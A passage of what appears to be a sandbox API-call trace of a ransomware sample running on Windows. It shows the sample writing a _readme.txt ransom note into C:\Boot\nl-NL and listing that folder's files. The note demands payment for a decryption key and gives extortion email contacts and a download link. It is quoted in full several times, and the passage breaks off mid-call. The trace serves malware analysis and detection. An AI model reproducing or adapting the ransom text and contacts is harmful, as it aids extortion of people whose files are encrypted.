RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.083] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.083] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.083] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.083] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.083] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.084] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.084] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.085] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.085] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.085] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.085] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.085] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.085] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.085] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.085] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0094.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.086] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.086] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x32cf950 [0094.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cf950 | out: hHeap=0x630000) returned 1 [0094.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b78ec8 [0094.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.087] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0094.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0094.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.088] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.088] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.089] PathFindFileNameW (pszPath="C:\\Boot\\nl-NL\\") returned="nl-NL\\" [0094.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.089] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.089] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0094.089] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.089] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.089] PathFindFileNameW (pszPath="") returned="" [0094.089] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0094.089] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0094.090] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0094.090] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x32faf28 [0094.090] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0094.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b78ec8 [0094.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0094.091] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.091] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0094.091] FreeLibrary (hLibModule=0x75670000) returned 1 [0094.091] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0094.091] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0094.091] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.091] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x81c) returned 0x9b78ec8 [0094.092] PathAppendW (in: pszPath="C:\\Boot\\nl-NL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0094.092] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.092] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.092] PathFileExistsW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 0 [0094.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x9ba4d90 [0094.093] lstrcpyW (in: lpString1=0x9ba4d90, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd" [0094.093] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsdd", lpString2="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT" [0094.093] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79fd8 [0094.093] CreateFileW (lpFileName="C:\\Boot\\nl-NL\\_readme.txt" (normalized: "c:\\boot\\nl-nl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0094.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x33515f0 [0094.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x853) returned 0x333bc58 [0094.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333bc58, cbMultiByte=2131, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 1108 [0094.094] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x32d0db8 [0094.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0094.094] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0094.094] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-Oc0xgfzC7q\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0198nTsddywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT") returned 1107 [0094.094] WriteFile (in: hFile=0x5c8, lpBuffer=0x32d0db8*, nNumberOfBytesToWrite=0x453, lpNumberOfBytesWritten=0x9e2fb64, lpOverlapped=0x0 | out: lpBuffer=0x32d0db8*, lpNumberOfBytesWritten=0x9e2fb64*=0x453, lpOverlapped=0x0) returned 1 [0094.095] CloseHandle (hObject=0x5c8) returned 1 [0094.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0094.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79fd8 | out: hHeap=0x630000) returned 1 [0094.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0094.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0094.096] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.096] FindFirstFileW (in: lpFileName="C:\\Boot\\nl-NL\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa19fbf60, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19fbf60, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0094.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.096] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa19fbf60, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19fbf60, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0094.096] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84c457e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0094.096] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19fbf60, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa19fbf60, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19fbf60, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0094.096] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa19fbf60, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa19fbf60, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19fbf60, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0094.096] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.096] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd20 | out: hHeap=0x630000) returned 1 [0094.096] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd20 [0094.097] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0094.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0094.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0094.097] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0094.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.097] HeapFree (in: hHeap=0x630000, dwFlags=0x0, 